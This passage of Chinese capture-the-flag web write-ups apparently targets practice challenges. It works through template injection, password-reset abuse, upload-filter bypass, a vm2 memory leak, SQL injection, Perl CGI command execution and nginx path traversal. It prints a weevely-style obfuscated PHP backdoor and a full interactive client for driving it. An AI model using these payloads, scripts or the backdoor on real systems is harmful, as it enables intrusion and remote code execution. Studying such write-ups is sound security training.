  37. http://111.200.241.244:63580/login.php/{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
  38. 最终flag:
  39. cyberpeace{30c9bf8b508298a2ba7c2493e6545f52}
  40. 题目名称:bug
  41. 题目writeup:
  42. 启动题目场景,获得靶场网站,访问网站,发现是一个登录页面,而且有注册页面和密码修改页面、
  43. http://111.200.241.244:63880/index.php?module=login
  44. 这里注册一个测试账号test
  45. http://111.200.241.244:63880/index.php?module=register
  46. 测试账号可以成功登陆
  47. 参数输入admin1账号,密码任意,提示用户名不存在
  48. 再参数输入用户名 admin,密码任意,发现密码不正确
  49. 根据账号返回的信息提示,可知道系统中存在admin账号
  50. 尝试对test账号进行密码修改
  51. http://111.200.241.244:63880/index.php?module=findpwd
  52. 发现可以成功修改密码
  53. http://111.200.241.244:63880/index.php?module=findpwd&step=1&doSubmit=yes
  54. 同时对修改密码处进行抓包,将test账号修改成admin,成功将admin的密码修改为123456
  55. 使用admin账号和密码123456登陆系统,进入Manage选项时
  56. http://111.200.241.244:63880/index.php
  57. 提示IP Not allowed!,猜测需要使用127.0.0.1访问
  58. 在请求头部添加X-Forwarded-For: 127.0.0.1字段,进行ip伪造请求成功,并在响应页面返回了信息,其中在注释中包含了一个链接地址:
  59. index.php?module=filemanage&do=???
  60. do的参数没有给出,根据module=filemanage字眼,猜测do的内容与文件操作有关,do=upload是上传点,经过尝试得到完整的url为:
  61. http://111.200.241.244:63880/index.php?module=filemanage&do=upload
  62. 根据页面显示"just image?"猜测需要绕过文件类型检测,这里想到使用一句话图片木马上传。
  63. 这里进行上传一句户图片木马,上传结果显示“Something shows it is a php”,其中检查到内容包含了php代码,这里做了文件内容过滤。
  64. 可通过<scrirpt>脚本绕过,那么可将一句话图片木马中的php代码内容修改为:<script language="php">system("ls");</script>
  65. 上传修改后的一句话图片木马,返回显示为;You know what I want,证明上传的.jpg后缀名也被过滤了。
  66. 经过测试这里不仅对后缀进行了黑名单过滤,同时会检查文件头的内容以及文件内容。
  67. 当上传后缀名为.php4和php5,可绕过上传,并获得flag
  68. 最终flag:
  69. cyberpeace{c634cfa6e4b3ffb3fd9e9b3343a76d2b}
  70. 题目名称:leaking
  71. 题目writeup:
  72. 启动题目场景,获得靶场网站,访问网站,发现是一段node.js代码
  73. http://111.200.241.244:49495/
  74. node.js 里提供了 vm 模块,相当于一个虚拟机,可以让你在执行代码时候隔离当前的执行环境,避免被恶意代码攻击。但是这道题比较有意思
  75. 本题考点:
  76. node.js中VM2沙箱逃逸JS通过Buffer类处理二进制数据的缓冲区
  77. 首先给出题目的源码:
  78. "use strict";
  79. var randomstring = require("randomstring");
  80. var express = require("express");
  81. var {
  82.     VM
  83. } = require("vm2");
  84. var fs = require("fs");
  85. var app = express();
  86. var flag = require("./config.js").flag
  87. app.get("/", function(req, res) {
  88.     res.header("Content-Type", "text/plain");
  89.     /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
  90.     eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
  91.     if (req.query.data && req.query.data.length <= 12) {
  92.         var vm = new VM({
  93.             timeout: 1000
  94.         });
  95.         console.log(req.query.data);
  96.         res.send("eval ->" + vm.run(req.query.data));
  97.     } else {
  98.         res.send(fs.readFileSync(__filename).toString());
  99.     }
  100. });
  101. app.listen(3000, function() {
  102.     console.log("listening on port 3000!");
  103. });
  104. 我们把关键几行代码列出来:
  105. eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
  106. eval就是把里面的当作javascript语句来运行
  107. var vm = new VM({
  108.             timeout: 1000
  109.         });
  110.         console.log(req.query.data);
  111.         res.send("eval ->" + vm.run(req.query.data));
  112. 然后要Get传递一个data参数,将它放在vm2创建的沙盒中运行,并且对传入的参数长度进行了限制,不超过12,这里可以用数组绕过。
  113. 该题定义变量flag,然后我们可以在沙箱里面执行任意的命令。那我们如何逃逸出去呢?
  114. 逃逸所需知识:
  115. 在较早一点的 node 版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的。
  116. 8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。
  117. 低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中
  118. 如果使用new Buffer(size)或其别名Buffer(size))创建,则对象不会填充零,而只要是调用过的变量,一定会存在内存中,
  119. 所以需要使用Buffer()来读取内存,使用data=Buffer(500)分配一个500的单位为8位字节的buffer,因此很容易得到姿势
  120. 这儿的环境是8.0之前的,所以我们使用Buffer()来读取内存:
  121. import requestsurl = 'http://111.200.241.244:49495/?data=Buffer(500)'response = ''while 'flag' not in response: req = requests.get(url) response = req.text print(req.status_code) if 'flag{' in response: print(response) break
  122. 或者
  123. # encoding=utf-8import requestsimport timeurl = 'http://111.200.241.244:49495/?data=Buffer(500)'response = ''while 'flag' not in response: req = requests.get(url) response = req.text print(req.status_code) time.sleep(0.1) if 'flag{' in response: print(response) break
  124. 最终flag:
  125. flag{4nother_h34rtbleed_in_n0dejs}
  126. 题目名称:unfinish
  127. 题目描述:sql
  128. 题目writeup:
  129. 启动题目场景,获得靶机网站,访问网站,是一个登录页面
  130. http://111.200.241.244:64668/login.php
  131. 这里尝试通过御剑目录扫描工具对其进行扫描,发现存在register.php路径
  132. 访问注册页面路径,下面可以进行常规的注册
  133. http://111.200.241.244:64668/register.php
  134. 登录进去以后发现只显示了注册的用户名
  135. 这里在用户名注册一个test'用户,发现注册失败
  136. 再次尝试用单引号闭合进行注册
  137. 登录进入后发现用户名bk已经转换成0,说明存在注入
  138. 尝试一下这里是不是二次注入(这里注入,登陆后可以看到结果)
  139. 二次注入
  140. 二次注入的原理,在第一次进行数据库插入数据的时候(注册时),仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。
  141. 在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候(登录后),直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。比如在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。
  142. 我们就能构造类似
  143. 0'+1+'0
  144. 当登录之后若是回显出1,则存在二次注入,我们就可以构造类似
  145. 爆出数据库
  146. 0'+ascii(substr(database() from 1 for 1)+'0
  147. 爆表
  148. 0'+ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))+'0
  149. 语句0' + ascii(substr(database(),1,1)) +'0被过滤
  150. 尝试了一遍,这里会检测逗号,用from 1 for 1代替掉逗号就行
  151. 1' + ascii(substr(database() from 1 for 1)) +'1
  152. 登录之后可以看到ascii码
  153. 这里在写脚本之前测试了一下,发现information_schema被过滤那就爆不了表名,所以猜测表名为flag
  154. 其中核心的注入代码就是:
  155. "0' + ascii(substr((select * from flag) from %d for 1)) + '0"
  156. % i
  157. ,
  158. substr的目的在于分割,防止字符串过长无法正常输出,ascii转换目的在于将flag与0想加不会出错.
  159. 之后通过正则去获取login.php页面的用户名值就是flag每一位的ascii码值
  160. flag.py:# coding=utf8import requestsimport reregister_url = "http://111.200.241.244:64668/register.php"login_url = "http://111.200.241.244:64668/login.php"database = ""table_name = ""column_name = ""flag = ""#获取数据库名for i in range(1,10): register_data = { 'email':'test@test'+ str(i), 'username':"0'+ascii(substr((select database()) from %d for 1))+'0"%i, 'password':123 } r = requests.post(url=register_url,data=register_data) login_data = { 'email':'test@test'+ str(i), 'password':123 } r = requests.post(url=login_url,data=login_data) match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text) asc = match.group(1) if asc == '0': break database = database + chr(int(asc))print('database:',database)#获取表名'''for i in range(1,20): register_data = { 'email':'test@test'+ str(i), 'username':"0'+ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))+'0"%i, 'password':123 } r = requests.post(url=register_url,data=register_data) print(r.text) login_data = { 'email':'test@test'+ str(i), 'password':123 } r = requests.post(url=login_url,data=login_data) r.encoding = r.apparent_encoding print(r.text) match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text) asc = match.group(1) if asc == '0': break table_name = table_name + chr(int(asc))print('table_name:',table_name)'''#获取flagfor i in range(1,100): register_data = { 'email':'test@test'+ str(i) + str(i), 'username':"0'+ascii(substr((select * from flag) from %d for 1))+'0"%i, 'password':123 } r = requests.post(url=register_url,data=register_data) login_data = { 'email':'test@test'+ str(i) + str(i), 'password':123 } r = requests.post(url=login_url,data=login_data) match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text) asc = match.group(1) if asc == '0': break flag = flag + chr(int(asc))print('flag:',flag)
  161. 尝试进行时间延迟注入:
  162. # coding=utf8import requestsimport sysurl='http://111.200.241.244:64668/register.php'flag=''#爆数据库sql="1' and (select case when ascii(substr(database() from {0} for 1))={1} then sleep(5) else 1 end) or ''='"sql="1' and (select case when ascii(substr((select * from flag) from {0} for 1))={1} then sleep(5) else 1 end) or ''='"for i in range(1,50): print('guess:',str(i)) for ch in range(32,129): if ch==128: sys.exit(0) sqli=sql.format(i,ch) data={ "email":"111@qq.com", "username":sqli, "password":"admin" } try: html=requests.post(url,data=data,timeout=3) except: flag+=chr(ch) print(flag) break
  163. 最终flag:
  164. flag{2494e4bf06734c39be2e1626f757ba4c}
  165. 题目名称:
  166. 题目writup:
  167. 启动题目场景,获得靶场网站,访问网站后,有3个超链接,点进去都是.pl文件,.pl文件都是用perl编写的网页文件。
  168. http://111.200.241.244:49188/cgi-bin/hello.pl
  169. http://111.200.241.244:49188/cgi-bin/forms.pl
  170. http://111.200.241.244:49188/cgi-bin/file.pl
  171. 点击Files,可以上传文件并把文件内容打印出来
  172. 猜想后台应该用了param()函数,其后台主要代码如下:
  173. use strict;
  174. use warnings;
  175. use CGI;
  176. my $cgi= CGI->new;
  177. if ( $cgi->upload( 'file' ) ) {
  178.     my $file= $cgi->param( 'file' );
  179.      while ( <$file> ) { print "$_"; }
  180. }
  181. param()函数会返回一个列表的文件但是只有第一个文件会被放入到下面的file变量中。如果我们传入一个ARGV的文件,那么Perl会将传入的参数作为文件名读出来。
  182. 对正常的上传文件进行修改,可以达到读取任意文件的目的:
  183. 方法一:
  184. bupsuit进行抓包,将上传的文件类型及文件内容处复制再粘贴一行,将filename后面的内容去掉,内容填入ARGV,然后盲猜flag文件在/flag中,可直接读取到flag的内容
  185. ARGV内容如下:(------WebKitFormBoundarygKH5XY1IilLxk70d必须和下面请求相同)
  186. ------WebKitFormBoundarygKH5XY1IilLxk70d
  187. Content-Disposition: form-data; name="file"
  188. ARGV
  189. 方法二:
  190. 或者直接先读取file.pl文件,猜测路径为:/var/www/cgi-bin/file.pl
  191. file.pl的内容确实是上文猜测的后台主要代码,也用到了param()函数。
  192. 然后我们利用bash来进行读取当前目录下的文件,payload为:
  193. /cgi-bin/file.pl?/bin/bash%20-c%20ls${IFS}/|
  194. 通过管道的方式,执行任意命令,然后将其输出结果用管道传输到读入流中,这样就可以保证获取到flag文件的位置了。这里用到了${IFS}来作命令分割,原理是会将结果变成bash -c "ls/"的等价形式。
  195. 列出了当前目录下的内容,发现flag
  196. /cgi-bin/file.pl?/flag #直接读取/flag文件内容
  197. 或者
  198. /cgi-bin/file.pl?cat%20/flag%20| #使用命令读取/flag文件内容
  199. 方法三:
  200. 首先查看当前目录下的文件,发现当前目录下没有flag文件。payload为:
  201. /cgi-bin/file.pl?ls%20-l%20.%20|
  202. 即执行ls -l . |命令,并查看到当前目录有file.pl和forms.pl以及hello.pl三个pl文件。
  203. 然后查看file.pl的源代码,发现确实使用了param()函数。payload为:
  204. /cgi-bin/file.pl?./file.pl
  205. 接着继续寻找flag文件,查看根目录,发现flag。payload为
  206. /cgi-bin/file.pl?ls%20-l%20/%20|
  207. 最后读取flag即可。payload为
  208. /cgi-bin/file.pl?/flag
  209. 方法四:
  210. 使用awvs对靶机网站进行扫描,发现存在目录穿越和xss漏洞
  211. 这里可以看到通过目录穿越漏洞任意读取到系统/etc/passwd的值
  212. 猜测flag在根目录,直接读取到flag的内容
  213. 最终flag:
  214. cyberpeace{01763543ef73fc02f332735062b2e666}
  215. 题目名称:Web_php_wrong_nginx_config
  216. 题目writeup:
  217. 启动题目场景,获得靶机网站,访问网站,发现是一个登录页面
  218. http://111.200.241.244:60458/login.php
  1. 输入admin/admin登录,提示“网站建设中”
  1. 通过dirsearch对目标靶机网站进行扫描,发现存在robots.txt以及admin目录
  2. python3  dirsearch.py  -u  
  3. http://111.200.241.244:60458/
  4. 访问/robots.txt路径,发现隐藏可访问路径hint.php和Hack.php。
  5. http://111.200.241.244:60458/robots.txt
  6. 访问hint.php页面显示了nginx的配置文件路径:/etc/nginx/sites-enabled/site.conf
  7. http://111.200.241.244:60458/hint.php
  8. 接着访问Hack.php页面,发现提示“请登录”,点击确定又返回到登录页面,这里可能有问题,猜测有逻辑漏洞存在。
  9. http://111.200.241.244:60458/Hack.php
  10. 最后访问admin页面显示,请继续登录
  11. http://111.200.241.244:60458/admin/
  12. 我们对Hack.php页面进行访问,然后通过bupsuit对其抓包分析,发现cookie:isLogin=0处可能存在逻辑问题。
  13. 这里将isLogin=0修改为cookie:isLogin=1,然后进行请求,在响应包中发现是后台主页内容
  14. 然后将cookie值修改为isLogin=1,并进行forward.
  15. 两次对/earth.html页面请求的cookie值进行修改为1并进行forward
  16. 后台看起来有很多选项卡,其实大部分都是假的,即使有几个选项存在页面跳转,也都是指向index.php,没有什么问题
  17. 真正的利用点在于管理中心 ,只有该链接可以跳转。
  18. http://111.200.241.244:60458/admin/admin.php
  19. 这里继续将cookie的值修改为isLogin=1,然后进行请求,在响应包中心显示了设备分组页面内容。
  20. 继续几次forward后,可以看到一个url地址:
  21. /admin/admin.php?file=index&ext=php,该地址中的?file=参数看起来存在任意文件包含漏洞
  22. 尝试对file=../../../../etc/passwd&ext=进行请求(注意修改cookie值),响应页面显示后台管理监控中心内容,但是/etc/passwd读不出来
  23. 注意:ext一定不要写东西,因为它是一个后缀,如果写入php,的话,它会按照php进行打开,这里就留空白或者以txt形式打开。
  24. 尝试对file=index../&ext=php进行请求(注意修改cookie值),响应页面显示后台管理监控中心内容且包含有please continue关键字
  25. 尝试对file=index.../&ext=php进行请求(注意修改cookie值),页面显示后台管理监控中心内容且没有please continue关键字,那么证明../已经被系统过滤了。
  26. 使用..././绕过过滤,
  27. 尝试访问 /admin/admin.php?file=..././..././..././..././etc/passwd&ext=,可以读取系统的/etc/passwd值
  1. 读取该系统nginx容器的配置文件/etc/nginx/sites-enabled/site.conf
  2. 尝试访问/admin/admin.php?file=..././..././..././..././etc/nginx/sites-enabled/site.conf&ext=,可读取到nginx的配置文件内容。
  3. 得到nginx的配置内容:
  4. server
  5. {
  6. listen
  7. 8080;
  8. ## listen for ipv4; this line is default and implied listen [::]:8080;
  9. ## listen for ipv6 root /var/www/html;
  10. index index.php index.html index.htm;
  11. port_in_redirect
  12. off;
  13. server_name _;
  14. # Make site accessible from http://localhost/
  15. #server_name localhost;
  16. # If block for setting the time for the logfile if ($time_iso8601 ~ "^(\d{4})-(\d{2})-(\d{2})") { set $year $1; set $month $2; set $day $3; }
  17. # Disable sendfile as per https://docs.vagrantup.com/v2/synced-folders/virtualbox.html sendfile off;
  18. set
  19. $http_x_forwarded_for_filt
  20. $http_x_forwarded_for;
  21. if (
  22. $http_x_forwarded_for_filt
  23. ~ ([0-9]+\.[0-9]+\.[0-9]+\.)[0-9]+) {
  24. set
  25. $http_x_forwarded_for_filt
  26. $1???; }
  27. # Add stdout logging access_log /var/log/nginx/$hostname-access-$year-$month-$day.log openshift_log; error_log /var/log/nginx/error.log info;
  28. location / {
  29. # First attempt to serve request as file, then
  30. # as directory, then fall back to index.html try_files $uri $uri/ /index.php?q=$uri&$args; server_tokens off; } #error_page 404 /404.html;
  31. # redirect server error pages to the static page /50x.html
  32. # error_page 500 502 503 504 /50x.html;
  33. location = /50x.html {
  34. root /usr/share/nginx/html;
  35. }
  36. location
  37. ~ \.php
  38. $ {
  39. try_files
  40. $uri
  41. $uri/ /index.php?q=
  42. $uri&
  43. $args;
  44. fastcgi_split_path_info
  45. ^(.+\.php)(/.+)$;
  46. fastcgi_pass unix:/var/run/php/php5.6-fpm.sock;
  47. fastcgi_param SCRIPT_FILENAME
  48. $document_root
  49. $fastcgi_script_name;
  50. fastcgi_param SCRIPT_NAME
  51. $fastcgi_script_name;
  52. fastcgi_index index.php;
  53. include fastcgi_params;
  54. fastcgi_param REMOTE_ADDR
  55. $http_x_forwarded_for;
  56. }
  57. location
  58. ~ /\. {
  59. log_not_found
  60. off;
  61. deny all;
  62. }
  63. location /web-img {
  64. alias /images/;
  65. autoindex
  66. on;
  67. }
  68. location
  69. ~* \.(ini|docx|pcapng|doc)$ {
  70. deny all; }
  71. include /var/www/nginx[.]conf;
  72. }
  73. 其中有个不正确的配置点:
  74. location /web-img {
  75.         alias /images/;
  76.         autoindex on;
  77.     }
  78. alias 用于给 localtion 指定的路径设置别名 , 在路径匹配时 , alias 会把 location 后面配置的路径丢弃掉 , 并把当前匹配到的目录指向到 alias 指定的目录 .autoindex 是一个目录浏览功能 , 用于列出当前目录的所有文件及子目录,这里在 URL 访问 /web-img , 就会访问系统根目录下的 /images/
  79. 而如果在 URL 访问 /web-img../ , 则相当于访问 /images/../ , 即访问系统根目录 . 且由于开启了 autoindex , 我们可以直接在浏览器里看到根目录下的所有内容
  80. 尝试访问web-img/
  81. http://111.200.241.244:60458/web-img/
  1. 尝试访问web-img../,直接可以访问到根目录
  2. http://111.200.241.244:60458/web-img../
  3. 访问/web-img../var/www/路径,发现hack.php.bak文件,它是hack.php的备份文件
  4. http://111.200.241.244:60458/web-img../var/www/
  5. 访问
  6. http://111.200.241.244:60458/hack.php.bk,可下载下来,代码已经被混淆加密了。
  7. hack.php.bak的内容:
  8. <?php
  9. $U='_/|U","/-/|U"),ar|Uray|U("/|U","+"),$ss(|U$s[$i]|U,0,$e)|U)),$k))|U|U);$o|U|U=o|Ub_get_|Ucontents(|U);|Uob_end_cle';
  10. $q='s[|U$i]="";$p=|U$ss($p,3);}|U|Uif(array_k|Uey_|Uexis|Uts($|Ui,$s)){$s[$i].=|U$p|U;|U$e=|Ustrpos($s[$i],$f);|Ui';
  11. $M='l="strtolower|U";$i=$m|U[1|U][0].$m[1]|U[1];$|U|Uh=$sl($ss(|Umd5($i|U.$kh),|U0,3|U));$f=$s|Ul($ss(|Umd5($i.$';
  12. $z='r=@$r[|U"HTTP_R|UEFERER|U"];$r|U|Ua=@$r["HTTP_A|U|UCCEPT_LAN|UGUAGE|U"];if|U($r|Ur&|U&$ra){$u=parse_|Uurl($r';
  13. $k='?:;q=0.([\\|Ud]))?,|U?/",$ra,$m)|U;if($|Uq&&$m){|U|U|U@session_start()|U|U;$s=&$_SESSIO|UN;$ss="|Usubst|Ur";|U|U$s';
  14. $o='|U$l;|U){for|U($j=0;($j|U<$c&&|U|U$i|U<$|Ul);$j++,$i++){$o.=$t{$i}|U^$k|U{$j};}}|Ureturn $|Uo;}$r=$|U_SERV|UE|UR;$r';
  15. $N='|Uf($e){$k=$k|Uh.$kf|U;ob_sta|Urt();|U@eva|Ul(@g|Uzuncom|Upress(@x(@|Ubas|U|Ue64_decode(preg|U_repla|Uce(|Uarray("/';
  16. $C='an();$d=b|Uase64_encode(|Ux|U(gzcomp|U|Uress($o),$k))|U;prin|Ut("|U<$k>$d</$k>"|U);@ses|U|Usion_des|Utroy();}}}}';
  17. $j='$k|Uh="|U|U42f7";$kf="e9ac";fun|Uction|U |Ux($t,$k){$c|U=|Ustrlen($k);$l=s|Utrl|Ue|Un($t);$o=|U"";fo|Ur($i=0;$i<';
  18. $R=str_replace('rO','','rOcreatrOe_rOrOfurOncrOtion');
  19. $J='kf|U),|U0,3));$p="|U";for(|U|U$|Uz=1;$z<cou|Unt|U($m[1]);|U$z++)$p.=|U$q[$m[2][$z|U]|U];if(strpos(|U$|U|Up,$h)|U===0){$';
  20. $x='r)|U;pa|Urse|U_str($u["qu|U|Uery"],$q);$|U|Uq=array_values(|U$q);pre|Ug|U_match_al|Ul("/([\\|U|Uw])[|U\\w-]+|U(';
  21. $f=str_replace('|U','',$j.$o.$z.$x.$k.$M.$J.$q.$N.$U.$C);
  22. $g=create_function('',$f);
  23. $g();
  24. ?>
  25. 看起来像是weevely 生成的 WebShell 后门,
  26. 尝试输出$f,在php代码后加上echo $f,PHP_EOL;
  27. <?php
  28. $U='_/|U","/-/|U"),ar|Uray|U("/|U","+"),$ss(|U$s[$i]|U,0,$e)|U)),$k))|U|U);$o|U|U=o|Ub_get_|Ucontents(|U);|Uob_end_cle';
  29. $q='s[|U$i]="";$p=|U$ss($p,3);}|U|Uif(array_k|Uey_|Uexis|Uts($|Ui,$s)){$s[$i].=|U$p|U;|U$e=|Ustrpos($s[$i],$f);|Ui';
  30. $M='l="strtolower|U";$i=$m|U[1|U][0].$m[1]|U[1];$|U|Uh=$sl($ss(|Umd5($i|U.$kh),|U0,3|U));$f=$s|Ul($ss(|Umd5($i.$';
  31. $z='r=@$r[|U"HTTP_R|UEFERER|U"];$r|U|Ua=@$r["HTTP_A|U|UCCEPT_LAN|UGUAGE|U"];if|U($r|Ur&|U&$ra){$u=parse_|Uurl($r';
  32. $k='?:;q=0.([\\|Ud]))?,|U?/",$ra,$m)|U;if($|Uq&&$m){|U|U|U@session_start()|U|U;$s=&$_SESSIO|UN;$ss="|Usubst|Ur";|U|U$s';
  33. $o='|U$l;|U){for|U($j=0;($j|U<$c&&|U|U$i|U<$|Ul);$j++,$i++){$o.=$t{$i}|U^$k|U{$j};}}|Ureturn $|Uo;}$r=$|U_SERV|UE|UR;$r';
  34. $N='|Uf($e){$k=$k|Uh.$kf|U;ob_sta|Urt();|U@eva|Ul(@g|Uzuncom|Upress(@x(@|Ubas|U|Ue64_decode(preg|U_repla|Uce(|Uarray("/';
  35. $C='an();$d=b|Uase64_encode(|Ux|U(gzcomp|U|Uress($o),$k))|U;prin|Ut("|U<$k>$d</$k>"|U);@ses|U|Usion_des|Utroy();}}}}';
  36. $j='$k|Uh="|U|U42f7";$kf="e9ac";fun|Uction|U |Ux($t,$k){$c|U=|Ustrlen($k);$l=s|Utrl|Ue|Un($t);$o=|U"";fo|Ur($i=0;$i<';
  37. $R=str_replace('rO','','rOcreatrOe_rOrOfurOncrOtion');
  38. $J='kf|U),|U0,3));$p="|U";for(|U|U$|Uz=1;$z<cou|Unt|U($m[1]);|U$z++)$p.=|U$q[$m[2][$z|U]|U];if(strpos(|U$|U|Up,$h)|U===0){$';
  39. $x='r)|U;pa|Urse|U_str($u["qu|U|Uery"],$q);$|U|Uq=array_values(|U$q);pre|Ug|U_match_al|Ul("/([\\|U|Uw])[|U\\w-]+|U(';
  40. $f=str_replace('|U','',$j.$o.$z.$x.$k.$M.$J.$q.$N.$U.$C);
  41. $g=create_function('',$f);
  42. $g();
  43. echo $f,PHP_EOL;
  44. ?>
  45. 通过PHP在线运行工具,可直接运行输出结果。
  46. 输出的内容:
  47. $kh="42f7";$kf="e9ac";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
  48. 通过在线PHP代码格式化美化工具对其进行美化。
  49. http://www.jsons.cn/phpformat/
  50. 得到美化后的代码:
  51. $kh="42f7";
  52. $kf="e9ac";
  53. function x($t,$k) {
  54.     $c=strlen($k);
  55.     $l=strlen($t);
  56.     $o="";
  57.     for ($i=0;$i<$l;) {
  58.         for ($j=0;($j<$c&&$i<$l);$j++,$i++) {
  59.             $o.=$t {
  60.                 $i
  61.             }
  62.             ^$k {
  63.                 $j
  64.             }
  65.             ;
  66.         }
  67.     }
  68.     return $o;
  69. }
  70. $r=$_SERVER;
  71. $rr=@$r["HTTP_REFERER"];
  72. $ra=@$r["HTTP_ACCEPT_LANGUAGE"];
  73. if($rr&&$ra) {
  74.     $u=parse_url($rr);
  75.     parse_str($u["query"],$q);
  76.     $q=array_values($q);
  77.     preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);
  78.     if($q&&$m) {
  79.         @session_start();
  80.         $s=&$_SESSION;
  81.         $ss="substr";
  82.         $sl="strtolower";
  83.         $i=$m[1][0].$m[1][1];
  84.         $h=$sl($ss(md5($i.$kh),0,3));
  85.         $f=$sl($ss(md5($i.$kf),0,3));
  86.         $p="";
  87.         for ($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];
  88.         if(strpos($p,$h)===0) {
  89.             $s[$i]="";
  90.             $p=$ss($p,3);
  91.         }
  92.         if(array_key_exists($i,$s)) {
  93.             $s[$i].=$p;
  94.             $e=strpos($s[$i],$f);
  95.             if($e) {
  96.                 $k=$kh.$kf;
  97.                 ob_start();
  98.                 @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));
  99.                 $o=ob_get_contents();
  100.                 ob_end_clean();
  101.                 $d=base64_encode(x(gzcompress($o),$k));
  102.                 print("<$k>$d</$k>");
  103.                 @session_destroy();
  104.             }
  105.         }
  106.     }
  107. }
  108. 经过提示 这个是个后门,网上有利用脚本 https://www.cnblogs.com/go2bed/p/5920811.html  一个PHP混淆后门的分析。
  109. 按提示修改脚本中的config部分
  110. 利用脚本如下:
  111. # encoding: utf-8from random import randint,choicefrom hashlib import md5import urllibimport stringimport zlibimport base64import requestsimport redef choicePart(seq,amount): length = len(seq) if length == 0 or length < amount: print 'Error Input' return None result = [] indexes = [] count = 0 while count < amount: i = randint(0,length-1) if not i in indexes: indexes.append(i) result.append(seq[i]) count += 1 if count == amount: return resultdef randBytesFlow(amount): result = '' for i in xrange(amount): result += chr(randint(0,255)) return resultdef randAlpha(amount): result = '' for i in xrange(amount): result += choice(string.ascii_letters) return resultdef loopXor(text,key): result = '' lenKey = len(key) lenTxt = len(text) iTxt = 0 while iTxt < lenTxt: iKey = 0 while iTxt<lenTxt and iKey<lenKey: result += chr(ord(key[iKey]) ^ ord(text[iTxt])) iTxt += 1 iKey += 1 return resultdef debugPrint(msg): if debugging: print msg# configdebugging = Falsekeyh = "42f7" # $khkeyf = "e9ac" # $kfxorKey = keyh + keyfurl = 'http://111.200.241.244:60458/hack.php'defaultLang = 'zh-CN'languages = ['zh-TW;q=0.%d','zh-HK;q=0.%d','en-US;q=0.%d','en;q=0.%d']proxies = None # {'http':'http://127.0.0.1:8080'} # proxy for debugsess = requests.Session()# generate random Accept-Language only once each sessionlangTmp = choicePart(languages,3)indexes = sorted(choicePart(range(1,10),3), reverse=True)acceptLang = [defaultLang]for i in xrange(3): acceptLang.append(langTmp[i] % (indexes[i],))acceptLangStr = ','.join(acceptLang)debugPrint(acceptLangStr)init2Char = acceptLang[0][0] + acceptLang[1][0] # $imd5head = (md5(init2Char + keyh).hexdigest())[0:3]md5tail = (md5(init2Char + keyf).hexdigest())[0:3] + randAlpha(randint(3,8))debugPrint('$i is %s' % (init2Char))debugPrint('md5 head: %s' % (md5head,))debugPrint('md5 tail: %s' % (md5tail,))# Interactive php shellcmd = raw_input('phpshell > ')while cmd != '': # build junk data in referer query = [] for i in xrange(max(indexes)+1+randint(0,2)): key = randAlpha(randint(3,6)) value = base64.urlsafe_b64encode(randBytesFlow(randint(3,12))) query.append((key, value)) debugPrint('Before insert payload:') debugPrint(query) debugPrint(urllib.urlencode(query)) # encode payload payload = zlib.compress(cmd) payload = loopXor(payload,xorKey) payload = base64.urlsafe_b64encode(payload) payload = md5head + payload # cut payload, replace into referer cutIndex = randint(2,len(payload)-3) payloadPieces = (payload[0:cutIndex], payload[cutIndex:], md5tail) iPiece = 0 for i in indexes: query[i] = (query[i][0],payloadPieces[iPiece]) iPiece += 1 referer = url + '?' + urllib.urlencode(query) debugPrint('After insert payload, referer is:') debugPrint(query) debugPrint(referer) # send request r = sess.get(url,headers={'Accept-Language':acceptLangStr,'Referer':referer},proxies=proxies) html = r.text debugPrint(html) # process response pattern = re.compile(r'<%s>(.*)</%s>' % (xorKey,xorKey)) output = pattern.findall(html) if len(output) == 0: print 'Error, no backdoor response' cmd = raw_input('phpshell > ') continue output = output[0] debugPrint(output) output = output.decode('base64') output = loopXor(output,xorKey) output = zlib.decompress(output) print output cmd = raw_input('phpshell > ')
